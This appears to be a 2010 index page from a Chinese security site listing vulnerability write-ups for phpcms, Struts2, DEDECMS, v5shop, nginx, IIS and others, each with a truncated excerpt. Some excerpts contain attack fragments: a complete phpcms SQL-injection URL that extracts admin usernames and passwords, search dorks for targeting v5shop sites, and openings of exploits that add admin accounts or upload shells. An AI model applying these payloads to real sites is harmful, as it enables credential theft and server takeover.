|
|
Windows Win32k.sys 窗口创建漏洞
|
|
日期:2010-08-11 09:52:12
点击:90 评论:0
|
漏洞描述: 由于 Windows 内核模式驱动程序在创建窗口时未正确验证所有参数,因此存在一个特权提升漏洞。 成功利用此漏洞的攻击者可以运行内核模式中的任意代码。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 应用程序通过hook |
|
|
最新 phpcms 0day(图)
|
|
日期:2010-08-11 09:49:43
点击:865 评论:0
|
2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23action=vote 红色替换为评论ID 3、重新查看评论 首发tools,form:0daynet,由情整理编辑 |
|
|
Struts2和Webwork远程命令执行漏洞分析
|
|
日期:2010-08-09 13:05:05
点击:194 评论:0
|
在漏洞发现者发布的POC中,并不能影响xwork 2.1.2之前的一些版本(这个版本之前的一些版本,下文会统称为老版本,之后的叫做新版),例如struts 2.0.14(就是struts修补了N个高危漏洞后的第一个版本,最常用的版本)其实是不能打的,本文会分析这个漏洞的起因,和结果,也 |
|
|
MyPHP Forum SQL注入漏洞
|
|
日期:2010-08-02 10:48:00
点击:66 评论:0
|
受影响系统: MyPHP.ws MyPHP Forum v3.0 (Final) 描述: BUGTRAQ ID: 27118 MyPHP Forum是一个易于架设并且易于使用基于MySQL与PHP的论坛。 MyPHP Forum处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。 MyPHP Forum的faq.php文件没有 |
|
|
114啦网址导航建站系统跨站漏洞与利用
|
|
日期:2010-08-02 10:47:13
点击:221 评论:1
|
114啦网址导航是目前国内使用率最高的网址导航之一,本网址导航生成系统为雨林木风自主研发. 漏洞分析: 程序当中的/url-submit/index.php对提交的数据未过滤或编码直接插入数据库,造成了储蓄性XSS漏洞 漏洞利用: exp.js //添加一个管理员账户 var siteurl = document.U |
|
|
Struts2/XWork 安全漏洞及解决办法
|
|
日期:2010-07-29 18:30:42
点击:402 评论:0
|
exploit-db网站在7月14日爆出了一个Struts2的远程执行任意代码的漏洞。 漏洞名称:Struts2/XWork 2.2.0 Remote Command Execution Vulnerability 相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ Struts2的核心是使用的webwork |
|
|
天缘学校网站系统 v1.3 上传漏洞
|
|
日期:2010-07-27 10:07:57
点击:94 评论:0
|
打开admin目录,发现有一个upload.asp,这个文件是提交并对提交的文件进行判断的,里面有这么一句 if Uprequest.form(file_Err)0 then select case Uprequest.form(file_Err) 不过我看了半天也没看出来这个 file_Err读取的是什么,(本人很菜的)那就去前台的目录好好 |
|
|
PHPCMS2008 sp3、sp4 SQL注入漏洞 & exp
|
|
日期:2010-07-27 10:07:10
点击:210 评论:0
|
很简单的小漏洞,很早就发现了,5月初丢t00ls核心了,又两个多月过去了,咋就没人公布呢。。。算了,最近没啥文章,把这个发上来凑凑数。 又是未初始化,又是全局...国内的程序很多就是模拟全局,于是带来问题...想当初那个dz不也是么...还有很多php程序这样...对于程 |
|
|
超级巡警 <= v4 Build0316 ASTDriver.sys 本地特权提升漏洞
|
|
日期:2010-07-16 10:49:33
点击:84 评论:0
|
该漏洞是我2010年4月6日晚上,通过自己的IoControl Fuzz工具挖掘的。漏洞存在于 超级巡警 ASTDriver.sys这个驱动中,影响超级巡警v4 Build0316和以前的版本。利用该漏洞能够实现本地特权提升,进Ring0。 PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was r |
|
|
v5shop 网上商城系统通杀oday
|
|
日期:2010-07-12 11:12:52
点击:259 评论:0
|
v5shop 网上商城系统通杀oday 关键字:services.aspxid= inurl:scoreindex.aspx 官网测试已被和谐 ! 漏洞危害:高危 官网网站 www.v5shop.com.cn 测试exp效果 直接爆管理员账号密码 默认后台地址:weblogin/Login.aspx 以下是测试EXP: cart.aspx?act=buyid=1 and (Sel |
|
|
百度贴吧吧主密码窃取漏洞
|
|
日期:2010-07-02 10:00:08
点击:142 评论:0
|
百度X吧发帖允许发送指定白名单URL的FLASH,白名单如下: flashWhiteList:[a href=a href=http://www.tudou.com/v/%22,%22http://www.tudou.com/player/playlist.swf?lid=,http://6.cn/,http://player.ku6.com/refer/,http://img.ku6.com/common/V2.0.baidu.swf?vid=,h |
|
|
PHP代码执行漏洞-总结
|
|
日期:2010-07-01 10:27:01
点击:453 评论:0
|
参考自: http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html 一 代码执行函数 PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等 demo code 1.1: |
|
|
HDWiki百科程序后台Getshell漏洞
|
|
日期:2010-07-01 10:25:37
点击:292 评论:0
|
HDWiki采用了模板机制,模板编译后会保存到data/view目录下,为php文件,之后展现模板时又include之,导致可以拿webshell 漏洞代码在lib/template.class.php文件: function display($file){//展现模板 by cnhackerx@163.com GLOBAL $starttime,$mquerynum; $mtime = e |
|
|
Php168一个即将被补的代码执行?
|
|
日期:2010-05-26 10:41:33
点击:47 评论:0
|
据可靠线报,有人已发现此相似漏洞[漏洞虽不一样,但在同一个文件,利用了相同的变量]并发在黑防上了,估计官方很快就会发布补丁了吧,那么我这个exp恐怕也会废掉了:) #!/usr/bin/php ?php print_r(' +------------------------------------------------------------------- |
|
|
DEDECMS v5.5 GBK Final 的一个鸡肋漏洞
|
|
日期:2010-05-26 10:41:07
点击:69 评论:0
|
在session.auto_start开启的情况下可以任意覆盖$_SESSION变量,我们可以伪造管理员登录并上传文件 /DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php 上传时重命名为 *.php. 即可绕过检查上传shell exp: form action= method='POST' enctype=multipa |
|
|
IIS源码泄露及文件类型解析错误
|
|
日期:2010-05-21 15:05:17
点击:58 评论:0
|
漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码,也可能错 |
|
|
nginx文件类型错误解析漏洞
|
|
日期:2010-05-21 10:10:54
点击:62 评论:0
|
漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意 |
|
|
|
|
本月热点文章 |
|
|
|
|
|
本月推荐文章 |
|
|
|
|
|
相关分类 |
|
|
|
|